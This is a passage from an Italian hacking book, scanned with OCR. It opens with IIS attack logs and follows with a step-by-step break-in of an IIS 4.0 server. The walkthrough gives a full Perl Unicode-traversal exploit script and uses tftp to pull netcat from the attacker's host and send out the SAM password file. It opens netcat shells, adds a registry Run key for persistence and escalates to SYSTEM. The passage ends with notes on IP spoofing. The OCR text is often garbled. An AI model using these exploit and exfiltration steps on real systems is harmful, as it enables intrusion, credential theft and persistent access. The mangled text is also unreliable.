2001-12-12 22:21:42 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. ./Admin.dll - 500 - 

2001-12-12 22:21:44 217 .82.33.74 - 217 . 57 .163 . 98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt /system32/ cmd. exe /c+dir 200 - 

2001-12-12 22:21:45 217 .82.33.74 - 217 .57 .163 .98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt /system32/ cmd. exe /c+tftp%20- 

i%20217. 82. 33. 74%20GET%20Admin . dll%20c : \Admin.dll 502 - 

2001-12-12 22:21:46 217 .82.33.74 - 217 .57 .163 .98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/ system32Zcmd.exe /c+tftp%20- 

i%20217. 82. 33. 74%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-12 22:21:48 217 .82.33.74 - 217 .57 .163 .98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt /system32/ cmd. exe /c+tftp%20- 

i%20217. 82. 33. 74%20GET%20Admin . dll%20e : \Admin.dll 502 - 

2001-12-12 22:21:48 217 .82.33.74 - 217 .57 .163 .98 80 GET 

/_vti_bin/. .%5c. ./. .%5c. ./. .%5c. ./Admin.dll - 500 - 

2001-12-12 22:21:49 217 .82.33.74 - 217 . 57 .163 . 98 80 GET 

/_mem_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/ system32Zcmd.exe /c+dir 404 - 

2001-12-12 22:21:51 217 .82.33.74 - 217 .57 .163 .98 80 GET 

/msadc/ . . %5c. ./. . %5c. ./. . %5c/ . .A» . ./ . .À» . ./. .A» . . /winnt /system32/ cmd. 

exe /c+dir 403 - 

2001-12-12 22:21:52 217 .82.33.74 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .A» .. /winnt /system32/ cmd. exe /c+dir 500 - 
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2001-12-12 22:21:53 217 .82.33.74 - 217.57.163.98 80 GET 
/scripts/winnt/system32/cmd.exe /c+dir 404 - 
2001-12-12 22:21:54 217 .82.33.74 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . . / . . /winnt/system32/cmd.exe /c+dir 200 - 
2001-12-12 22:21:54 217 .82.33.74 - 217 . 57 .163 . 98 80 GET 
/scripts/ . ./. . /winnt/system32/cmd. exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin . dll%20c : \Admin.dll 502 - 
2001-12-12 22:21:56 217 .82.33.74 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . ./. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-12 22:21:57 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ . ./• . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin . dll%20e : \Admin.dll 502 - 
2001-12-12 22:21:58 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ ../.. /Admin.dll - 500 - 

2001-12-12 22:21:58 217 .82.33.74 - 217 . 57 .163 . 98 80 GET 
/scripts/ .. \ .. /winnt/system32/cmd. exe /c+dir 200 - 
2001-12-12 22:22:00 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ . . \. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin.dll%20c: \Admin.dll 502 - 
2001-12-12 22:22:02 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ . . \. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-12 22:22:02 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ . . \. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin . dll%20e : \Admin.dll 502 - 
2001-12-12 22:22:04 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ .. \ .. /Admin.dll - 500 - 

2001-12-12 22:22:04 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ .. %5c .. /winnt/system32/cmd. exe /c+dir 200 - 
2001-12-12 22:22:05 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd. exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin . dll%20c : \Admin.dll 502 - 
2001-12-12 22:22:07 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-12 22:22:08 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. . /winnt/system32 / cmd. exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin . dll%20e : \Admin.dll 502 - 
2001-12-12 22:22:09 217 .82.33.74 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. ./Admin.dll - 500 - 

2001-12-12 22:22:09 217 .82.33.74 - 217 . 57 .163 . 98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd. exe /c+dir 200 - 
2001-12-12 22:22:11 217 .82.33.74 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /vinnt/ system32Zcmd.exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin . dll%20c : \Admin.dll 502 - 
2001-12-12 22:22:11 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. . /winnt/syst em32/cmd.exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-12 22:22:13 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. . /winnt/ system32Zcmd.exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin . dll%20e : \Admin.dll 502 - 
2001-12-12 22:22:15 217 .82.33.74 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. ./Admin.dll - 500 - 

2001-12-12 22:22:15 217 .82.33.74 - 217 . 57 .163 . 98 80 GET 
/scripts/ .. %5c. . /winnt /system32 /cmd. exe /c+dir 200 - 
2001-12-12 22:22:17 217 .82.33.74 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/syst em32/cmd.exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin . dll%20c : \Admin.dll 502 - 
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2001-12-12 22:22:18 217.82.33.74 - 217 .57 .163 .98 80 GET 
/ script s/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-12 22:22:23 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/ script s/ . .%5c. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin . dll%20e : \Admin.dll 502 - 
2001-12-12 22:22:23 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ . . %5c. . /Admin.dll - 500 - 

2001-12-12 22:22:24 217 .82.33.74 - 217 . 57 .163 . 98 80 GET 
/scripts/ .. %2f .. /winnt/system32/cmd.exe /c+dir 200 - 
2001-12-12 22:22:26 217 .82.33.74 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%2f. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin . dll%20c : \Admin.dll 502 - 
2001-12-12 22:22:27 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ . .%2f. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-12 22:22:29 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ . .%2f. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin . dll%20e : \Admin.dll 502 - 
2001-12-12 22:22:30 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/. .%2f. ./Admin.dll - 500 - 

2001-12-12 22:27:54 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/ 'scripts/ 'root .exe /c+dir 404 - 

2001-12-12 22:30:50 217 .57 .79 .187 - 217 . 57 .163 . 98 80 GET 
/scripts/root . exe /c+dir 404 - 

2001-12-12 22:30:55 217 .57 .79 .187 - 217 . 57 .163 . 98 80 GET 
/MSADC/ root. exe /c+dir 403 - 

2001-12-12 22:31:08 217 .57 .79 .187 - 217 .57 .163 .98 80 GET 
/c/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-12 22:31:58 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/d/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-12 22:33:33 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/scripts/root .exe /c+dir 404 - 

2001-12-12 22:33:38 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/MSADC /root. exe /c+dir 403 - 

2001-12-12 22:33:43 217 .57 .79 .187 - 217 . 57 .163 . 98 80 GET 
/c/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-12 22:33:51 217 . 57 . 79 . 187 - 217 . 57 .163 . 98 80 GET 
/d/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-12 22:34:05 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd. exe /c+dir 200 - 
2001-12-12 23:38:08 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/scripts/root .exe /c+dir 404 - 

2001-12-12 23:38:13 217 .57 .79 .187 - 217 . 57 .163 . 98 80 GET 
/MSADC/ root .exe /c+dir 403 - 

2001-12-12 23:38:18 217 .57 .79 .187 - 217 . 57 .163 . 98 80 GET 
/c/winnt/system32/cmd . exe /c+dir 404 - 

2001-12-12 23:38:24 217 . 57 . 79 . 187 - 217 . 57 .163 . 98 80 GET 
/d/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-12 23:51:18 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/scripts/root .exe /c+dir 404 - 

2001-12-12 23:51:27 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/MSADC/ root .exe /c+dir 403 - 

2001-12-12 23:51:35 217 .57 .79 .187 - 217 . 57 .163 . 98 80 GET 
/c/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-12 23:51:49 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/d/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-12 23:52:16 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd. exe /c+dir 200 - 
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2001-12-12 23:53:28 217.57.79.187 - 217 .57 .163 .98 80 GET 
/ script s/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 57. 79. 187%20GET%20Admin . dll%20c : \Admin.dll 502 - 



Esempio utilizzante UN I CODE BUGS 

Come abbiamo detto precedentemente negli altri capitoli, le operazioni eseguite dagli hacker 
possono essere suddivise in cinque fasi. 

L'unico problema è che tutte le informazioni di questo libro sono state suddivise in un numero 
abbastanza elevato di pagine per cui potrebbero essere utili alcuni esempi in cui in poco 
spazio vengono mostrati dei prototipi di attacchi utilizzando le tecniche più comuni, ovvero 
quelle che non pretendono lunghi tempi di preparazione. 

La prima fase è quella legata all'enumerazione relativa al sistema vittima, fase nella quale 

l'hacker raccoglie tutte le informazioni possibili. 

In questa fase utilizzeremo nmapnt rilasciato dalla Eeye. 

Diamo il comando : 



L'opzione -O stà per OS fingerprint ovvero un comando indirizzato a cercare di individuare il 
sistema operativo. 



Starting nmapnt V. 1.30 by Eeye 




Interesting ports on ntkrkr (192.168.1, 


22) : 


(Ports scanned but not shown below are 


in state: filtered) 


Port State Service 




22/tcp unfiltered ssh 




80/tcp open http 




443/tcp open https 




TCP Sequence Prediction : Class=trivial 


time dependency 


Difficulty=4 (Trivial joke) 




Remote operating system guess: Windows 


NT4 / Win95 / Win98 



Dalle informazioni restituite da nmapnt ci rsulta che sul sistema è attivo il protocollo http (80). 
In alcuni capitoli abbiamo parlato di un utility che ci permette di leggere in modo RAW dalla 
rete. 

Questa è NETCAT mediante la quale possiamo cercare di connetterci a MS : 

ne -w 192.168.1.2 80 

ntkrkr [192.168.1.2] 80 (www) open 



HTTP/1.1 400 Bad Request 
Server : Mi eroso ft -US/ 4 . 0 
Date: Thu, 1 8 Jan 2001 23:23:22 GMT 
Con tent- Type : t ex t /html 
Content-Length : 87 

<htmlxhead><title>Error</title></head><body>The parameter is 



Da questo abbiamo visto che sul server è in esecuzione MS 4.0 per cui a questo punto 
potrebbe essere suscettibile al Traversai Bug. 

C:\ 

/ — InetPub/ 

I I - wwwroot/ 
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/ / / - scripts/ 

I 

I — winnt/ 

I I- system32/ 

La struttura di prima mostra la classica configurazione delle directory di MS e di Windows. 
Ilo nosto interesse, rispetto a questa struttura, sarebbe quella di eseguire il file CMD.EXE 
presente nella directory system di Windows. 
Usando il percorso assoluto dovremmo specificare : 

. ./• • /winnt /system32/cmd. exe 



Usando la sintasi WEB possiamo specificare da browser : 



http: // '192 .168 .1 . 2 / scripts/ . . %cl%pc. . /winnt/ system32/cmd. e. 


«e ?/c+dir 




i 4-H_k - -• . o La rati <a=— * ^p*™«— ^m~v i& si a - 






01/1B/C1 D^:15r <DIR> 

ci.' i e.< ci oìhsp pip? 

3 rilega» ■' t-'-c-- 


: 





Se all'interno del BROWSER vediamo la directory richiesta tramite il comando dato allora 
l'UNICODE BUG funziona. 

A questo punto possiamo cercare di dare dei comandi diretti al server usando un programma 
che si trova sulla rete il quale apre un socket inviando i comandi al server . 
Il suo listato è : 



# .' /usr/bin/perl 

# See http: //www. security focus . com/vdb/bottom . html ?section=exploitsvid=1806 

# Very simple PERL script to execute commands on US Unicode vulnerable servers 
§ Use port number with SSLproxy for testing SSL sites 

# Usage: unicodexecute2 IP: port command 
§ Only makes use of "Socket " library 

# 

# New in version2: 

§ Copy the cmd.exe to something else, and then use it . 
§ The script checks for this . 

§ Thnx to security@nsfocus.com for discovering the cmd.exe copy part 
# 

# Roelof Temmingh 2000/10/26 

§ roelof@sensepost.com http://www.sensepost.com 

use Socket; 

# init 

if ($#ARGV<1) {die "Usage: unicodexecute IP: port command\n" ; } 
($host, $port)=split (/:/, @ARGV[0]) ; 
$target = inet_aton($host) ; 

# test if cmd has been copied: 

$failed=l; 
$command= " dir " ; 

@results=sendraw ( "GET /scripts/ . .%c0%af. . /winnt /system32/ cmd. exe?/ c+$command 
HTTP/1 . 0\r\n \r\n ") ; 
foreach $line (Qresults) { 
if ($line =~ /sensepost . exe/) {$failed=0; } 

} 

$failed2=l; 

if ($failed==l) { 

print "Sensepost.exe not found - Copying CMD...\n"; 

$command="copy c:\\winnt\\system32\\cmd.exe sensepost.exe"; 

$command=~s/ /\%20/g; 
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@results2=sendraw ("GET /scripts/ . .%cO%af. . /winnt/system32/cmd. exe?/c+$command 
HTTP/1 . 0\r\n \r\n ") ; 
foreach $line2 (@results2) { 
if (($line2 =~ /copied/ )) ($fa±led2=0; } 

} 

if ($failed2==l) {die "Copy of CMD failed - inspect manually : \n@results2\n\n" } ; 

ì 

# we can assume that the cmd.exe is copied from here. . 

$command=@ARGV[ 1] ; 

print "Sensepost.exe found - Executing [$command] on $host : $port\n" ; 
$command=~s/ /\%20/g; 

my @results=sendraw ("GET /scripts/ . .%cO%af. . /inetpub/ scripts /sensepost . exe?/c+$command 
HTTP/1 . 0\r\n \r\n ") ; 
print @results; 

# Sendraw — thanx RFP rfp@wiretrip.net 

sub sendraw { # this saves the whole transaction anyway 
my ($pstr)=@_; 

socket (S, PF^INET, SOCK^STREAM, getprotobyname ( ' tcp ') / IO) Il 

die ( "Socket problems\n") ; 
if (connect (S,pack "SnA4x8", 2, $port, $target) ) { 

my @in; 

select (S) ; $1=1; print $pstr; 

while (<S>) { push @in, $_; } 
select (STDOUT) ; close(S); return @in; 
} else { die ( "Can 't connect .. .\n" ) ; } 

} 



L'esecuzione del comando avviene con la seguente linea: 

C:\> peri -x unicodexecute.pl 192.168.1.2:80 'dir' 

Executing dir on 192.168.1.2:80 

HTTP/1.1 200 OK 

Server : Mi eroso ft -US/ 4 . 0 

Date: Fri, 19 Jan 2001 00:15:26 GMT 

Content-Type : application/ octet -stream 

Volume in drive D has no label. 

Volume Serial Number is F465-557F 



Directory of D: \Inetpub\scripts 

01/18/01 03:15p <DIR> . 
01/18/01 03:15p <DIR> . . 

2 File (s) 0 bytes 
28,081, 664 bytes free 

A questo punto proviamo a lanciare sul server il comando tftp per trasferire neteat ovvero 
nc.exe 



C:\> peri -x unicodexecute.pl 192 .168 .1 .2:80 


'tftp -i 172.16.41. 71 


GET ne . exe ' 




Executing tftp -i 172.16.41.71 GET nc.exe on 


192.168.1.2:80 


HTTP/1 . 1 502 Gateway Error 




Server : Mi eroso ft -US/ 4 . 0 




Date: Fri, 19 Jan 2001 00:19:34 GMT 




Content-Length : 215 




Con tent- Type : t ex t /html 
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<body><hl>CGI Error</hl>The specified CGI application misbehaved by 
not returning 

Ora richiediamo la dir per vedere se il file è stato trasferito. 

Notate che l'indirizzo 172.16.41.71 è il nostro ovvero quello con cui tftp dovrà comunicare per 
trasferire il file. 

C:\> peri -x unicodexecute.pl 192.168.1.2:80 'dir' 
Executing dir on 192 .168 .1 .2:80 
Directory of D: \Inetpub\scripts 

01/18/01 04:19p <DIR> 
01/18/01 04:19p <DIR> 
01/18/01 04:19p 59,392 nc.exe 

3 File(s) 59,392 bytes 



Ora attiviamo NETCAT con : 

C:\> peri -x unicodexecute.pl 192 .168 .1 .2:80 'ne -L -p443 -d -e 
cmd. exe ' 




Il comando ha parto NETCAT sul server in modalità server (ricardatevi che NETCAT può 
funzionare da client e da server) per cui adesso dovremo aprire sul nostro sistema NETCAT 
in modalità client usando la stessa porta, la 443, specificata nelo comando di prima. 

C:\> ne 192.168.1.2 443 
Microsoft (R) Windows NT (TM) 
(C) Copyright 1985-1996 Microsoft Corp. 

D: \Inetpub\scripts>whoami 
whoami 

NTKRKR \ IUSR_NTKRKR 



Come potete vedere l'accesso è come utente IUSR_NTKRKR per cui ora tramiteb altri metodi 
vedremo come cercare di alzare il livello ad amministratore. 
Vedremo alcuni metodi differenti ma con lo stesso scopo. 

Inutile ripetere il discorso su MSADC il quale serve ad accedere a un sistema di database. 
Come default MS include MSADC mentre quest'ultimo a sua volta include nell'installazione un 
meccanismo chiamato RDS. 

Ora proveremo ad usare questa caratteristica per copiare quello definito con il termine di 
SAM (Windows Security Accounts Manager) ovvero un database criptato che contiene tutti gli 
ID e le password di Wndows. 

Il database SAM è normalmente bloccato durante le normali operazioni e non può essere 
utilizzato se non dall'amministratore. 

In ogni caso quando viene creato un disco di emergenza e viene utilizzata l'opzione /s nella 
creazione, una copia di questo viene salvata nella directory /winnt/repair. 
Partendo dalla shell che abbiamo aperto precedentemente diamo il comando : 

D: \Inetpub\scripts>copy \winnt\repair\sam._ 
copy \winnt\repair\sam._ 
Access is denied. 
0 file(s) copied. 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



Come potrete vedere non ci è stato dato il permesso. 

Ora recuperiamo lo script visto nei capitoli di questo libro chiamato MSADC.PL e lanciamolo 
C:\> peri -xmsadcl.pl -h 192.168.1.2 

— PDS exploit by rain forest puppy / ADM / Wiretrip — 

Please type the NT commandline you want to run (cmd /c assumed) : 

cmd /c tftp -i 172 .16 . 41 .71 PUT \winnt\repair\sam._ 



lo comando ci trasferisce il file sul nostro sistema tramite tftp. 

Ora che abbiamo il file SAM sul nostro sistema tramite LOphtCrack possiamo decodificare le 
password. 



* w C:\Pmgrarn Files LOphtCrack Z.5\pwdZB - LOphtCrack 2.5 



File Edit Tools Window Help 




Ora a questo punto cercheremo di aprire il registro remoto. 

H:\>net use q: \\192 . 168 . 1 . 2\d$ /user : administrator * 
Type the password for \\192 . 168 . 1 . 2\d$ : 
The command completed success fully . 

Usiamo REGEDIT per connetterci : 



Iconnect Network Reyistry 




Computer nanne: 


□ K 1 


1192.1 68.1.21 Cancel 




Browse... 



Ora scriviamoci lo start del nostro programma in modo che ogni volta che la macchina parte 
questo venga eseguito. 

Un posto comodo per inserire la voce è tramite questa chiave 

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion \Run and 

RunOnce, RunOnceEx, RunServices 

La riga da mettere è : 
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é' Registry Editor 










Registry Edit View Favorite^ Help 








+ X 


\ My Computer 


é 




Type 


1 Data 


é-E 


| 192,168,1,2 

]-Q HKEY_CLA55E5_ROOT 
]-Q HKEY_LOCAL_MACHINE 
É-E] HARDWARE 
É-Cl SAH 

_| SECURITY 
ÉQ SOFTWARE 
+ _| 3Com 




Ug (Default) 

QBrowserWebCheck 

@RealTray 

[^SysternTray 

B^etcat 


REG_SZ 
REG_SZ 
REG_SZ 
REG_SZ 
REG_5Z 


(value not set) 
loadwc.exe 

D:\Prograrn Files\Real\RealPlayer\RealPlay.exe SYSTÉ 
SysTray.Exe 

d:\inetpub\5cript5\nc -L -p50 -d -e cmd.exe 


*l 1 








1 * 


192. 168. 1 ,2\HKEV_LOCAL_MACHINE\SOFTWARE\Mii:rosoft\Window;\CurrentVer;ion\Run 







Ora attivando NETCAT sul nostro sistema vedremo se siamo riusciti ad avere la shell da 
Administrator. 



C:> ne 192.168.1.2 50 
Microsoft (R) Windows NT (TM) 
(C) Copyright 1985-1996 Microsoft Corp. 

D: \WINNT\Profiles \Administrator\Desktop>whoami 
whoami 

NTKRKR\Administrator 

Ora possiamo continuare a provare lo Spoofed LPC Port Request. 

Questo altro metodo serve a tentare di alzare il livello della nostra shell, come il sistema di 
prima. 

Tramite la nostra shell senza diritti di Administrator proviamo a uplodare il file hk.exe 

D: \Inetpub\scripts>tftp -i 172.16.41.71 GEThk.exe 
tftp -i 172.16.41.71 GET hk.exe 

Transfer success fui : 32768 bytes in 1 second, 32768 bytes/s 



D:\Inetpub\scripts>hk ne -L -p 25 -d -e cmd.exe 

hk ne -li -p 25 -d -e cmd.exe 
lsass pid & tid are: 50 - 53 

Launching line was : ne -L -p 25 -d -e cmd.exe 



Ora da un altro terminale proviamo neteat sulla porta 25. 

ne 192.168.1.2 25 
Microsoft (R) Windows NT (TM) 
(C) Copyright 1985-1996 Microsoft Corp. 



D: \Inetpub\scripts>whoami 
whoami 

NT AUTHORITY \ SYSTEM 



Chiaramente questi sistemi ci permettono di avere delle shell a livello di carattere. 
La forza di Windows è chiaramente la GUI per cui ora vedremo come cercare di avere una 
shell grafica tramite il programma distribuito gratuitamente dalla AT&T chiamato VNC.EXE. 
Cerchiamolo sulla rete e preleviamolo. 

Dovremo installare alcune voci nuove nel registro per cui creiamo un file chiamato winvnc.ini 
con dentro : 

HKEY_ USERS \ . DEFAULT \ Soft ware \ ORL \ WinVNC3 
SocketConnect = REG_DWORD 0x0000001 

Password = REG_BINARY 0x0000008 0x57bf2d2e 0x9e6cb06e 
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Il valore della PASSWORD è 'secret'. 

Ora installiamo VNC sulla nostra macchina e poi successivamente lo trasferiremo. 
I files sono : 



Lanciamo 

C:\>regini -m W192.168.1.2 winvnc.ini 

Ora lanciamo sulla nostra macchina : 

D: \WINNT\system32\viewers>winvnc -instali 



Ora installiamo VNC come servizio. 

D: \WINNT\system32 \ viewers>net start winvnc 
net start winvnc 

The VNC Server service is starting . 

The VNC Server service was started success fully . 




Dopo l'attivazione vedremo il computer remoto come si vede nell'immagine successiva. 
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Riferimenti ai bugs di I I S 



Vulnerability note 



CVE 
number 



Title 



http://www.kb.cert.orq/vuls/id/363715 



CAN-2002- 
0071 



Microsoft Internet Information 
Server (MS) vulnerable to heap 
overflow during processing of 
crafted ".htr" request by "ISM.DLL" 
ISAPI filter 



http://www.kb.cert.org/vuls/id/883091 



CAN-2002- 
0074 



Microsoft Internet Information 
Server (MS) contains cross-site 
scripting vulnerability in MS Help 
Files search facility</SMALL< 
font> 



http://www.kb.cert.org/vuls/id/886699 



CAN-2002- 
0148 



Microsoft Internet Information 
Server (MS) contains cross-site 
scripting vulnerability in HTTP error 
page results 



http://www.kb.cert.org/vuls/id/520707 



CAN-2002- 
0075 



Microsoft Internet Information 
Server (MS) contains cross-site 
scripting vulnerability in redirect 
response messages 



http://www.kb.cert.org/vuls/id/412203 



CAN-2002- 
0073 



Microsoft Internet Information 
Server (MS) vulnerable to DoS via 
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request</SMALL< font> 



http://www.kb.cert.org/vuls/id/454091 



CAN-2002- 
0150 



Microsoft Internet Information 
Server (MS) vulnerable to buffer 
overflow via inaccurate checking of 
delimiters in HTTP header fields 



http://www.kb.cert.org/vuls/id/721963 



CAN-2002- 
0149 



Microsoft Internet Information 
Server (MS) buffer overflow in 
server-side includes (SSI) 
containing long invalid file name 



http://www.kb.cert.org/vuls/id/521059 



CAN-2002- 
0072 



Microsoft Internet Information 
Server (MS) vulnerable to DoS 
when URL request exceeds 
maximum allowed length 



http://www.kb.cert.org/vuls/id/610291 



CAN-2002- 
0079 



Microsoft Internet Information 
Server (MS) buffer overflow in 
chunked encoding transfer 
mechanism 



http://www.kb.cert.org/vuls/id/669779 



CAN-2002- 
0147 



Microsoft Internet Information 
Server (MS) buffer overflow in 
chunked encoding transfer 
mechanism 
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Parte IX 

L'hacking avanzato 
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Spoof ing 

Il termine inglese significa imbrogliare e di fatto l'attività legata allo spoofing è appunto quella 
di imbrogliare i sistemi facendosi credere di essere uno degli host considerati come trust. 
Sicuramente è una delle tecniche più avanzate nell'ambito dell'hacking in quanto pretende 
una conoscenza molto buona delo stack del protocollo TCP. 

Come attività venne da prima pubblicata sulla carta grazie agli articoli di Steve Bellovin della 
Bell Laboratories il quale nel 1989 messe sull'avviso degli eventuali problemi che il protocollo 
avrebbe potuto avere. 

Questa attività per se stessa sarebbe più legata al semplice fatto di modificare i dati dentro 
all'header dei pacchetti inserendo all'interno del campo legato all'IP sorgente quello di un IP 
relativo di un host considerato come "fidato". 

Nell'articolo a cui abbiamo fatto cenno prima, il mondo informatico veniva avvisato del fatto 
che se in qualche modo ci fosse stata al possibilità di individuare il numero sequenziale usato 
all'interno degli headers dei pacchetti TCP, allora si sarebbe potuto tranquillamente stabilire 
una connessione con qualche server facendosi passare per qualche host fidato e questo 
grazie ad una lacuna dei sistemi Unix. 

In effetti l'opera di falsificazione non è solo legata all'attività di sostituzione dei sistemi ma 
potrebbe anche essere usata per creare degli attacchi DOS. 

Infatti se gli indirizzi falsificati fossero anche quelli di destinazione sarebbe possibile fare 

esaurire le risorse di un sistema mediante l'utilizzo di indirizzi di broadcast. 

Attività più complesse di quelle che potrebbero essere eseguite soltanto tramite l'invio dei 

pacchetti falsificati richiedono metodi che potrebbero richiedere algoritmi particolari. 

Sono considerati attacchi di spoofing i seguenti : 



• Land 

• Teardrop 

• NewTear 

• SynDrop 

• TearDrop2 

• Bonk 

• Boink 

• Fragment overlap 

• Ping of death 

• IP source route 

• Ping storm 

• smurf 

• ICMP unreachable storm 

• Suspicious router advertisement 

• UDP port loopback 

• snork 

• fraggle 

• SYN flood 

• DNS spoof 



Nei capitoli in cui abbiamo parlato dell'handshake dei pacchetti abbiamo visto che all'interno 
esiste un numero di sequenza il quale dovrebbe essere individuato in tutte quelle attività in 
cui si pretende un colloquio tra il server e il client. 

Infatti questa è la parte più complessa in quelle che sono le attività di sostituzione degli host. 
Ogni sistema operativo dispone di metodologie proprie legate alla generazione di questi 
numeri sequenziali e sempre a riguardo esistono comunque studi di qualsiasi tipo al fine di 
riuscire a trovare un metodo appropriato per l'individuazione di questi. 
Lo spoofing si basa sulla supposizione da parte dei servizi offerti dal TCP e dall'UDP che un 
indirizzo IP sia valido. 

L'host di un hacker può' tuttavia utilizzare un routing del codice IP di origine per presentarsi al 
server nelle vesti di un client valido. Un Hacker può impiegare il routing dell'IP di origine per 
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specificare un percorso diretto verso una destinazione e un percorso di ritorno verso 
l'origine(source routing, attualmente il source routing viene disabilitato). 
Quando io mi presento con un IP diverso dal mio devo far in modo che la risposta alla 
richiesta che invio mi debba tornare indietro, con il source routing infatti io riesco a specificare 
un percorso di ritorno( settando alcune opzioni del pacchetto IP), che comprenderà la mia 
macchina. In questo modo l'hacker può intercettare o modificare le trasmissioni. Il seguente 
esempio mostra il modo in cui il sistema di un hacker può prendere le vesti di un client valido 
per un determinato server. 

1 . L'hacker cambia il proprio indirizzo IP in modo da farlo corrispondere all'indirizzo IP del 
client valido, in questo caso si parla di indirizzo spoofato. 

2. L'hacker poi costruisce un percorso che conduce al server, ovvero il percorso diretto che i 
pacchetti dovranno prendere per giungere al server e per tornare all'host dell' hacker, 
utilizzando l'indirizzo del client valido come ultimo tratto del percorso per giungere al 
server. 

3. L'hacker utilizza il percorso di origine per inviare al server una richiesta del client. 

4. Il server accetta la richiesta dell'hacker come se questa provenisse dal client valido e poi 
restituisce la risposta all'host dell'hacker. 

5. Ogni risposta alle richieste da parte del client valido viene inviata all'host dell'hacker. 

Ultimamente ho trovato in rete uno studio che eseguiva una disposizione spaziale delle 
sequenze numeriche visualizzate mediante grafici i quali rappresentavano stranissime forme. 

I sistemi di spoofing vengono generalmente utilizzati nell'ambito delle metodologie indirizzate 
alla creazione di false relazioni trust sui sistemi Unix in modo tale che questi accettino 
comandi come rsh e rlogin da un altro computer senza richiedergli la password. 

All'interno di molti sistemi Unix esiste il concetto di 'trusted' hosts. 

II software di gestione del sistema operativo permetterà a questi sistemi definiti come tali di 
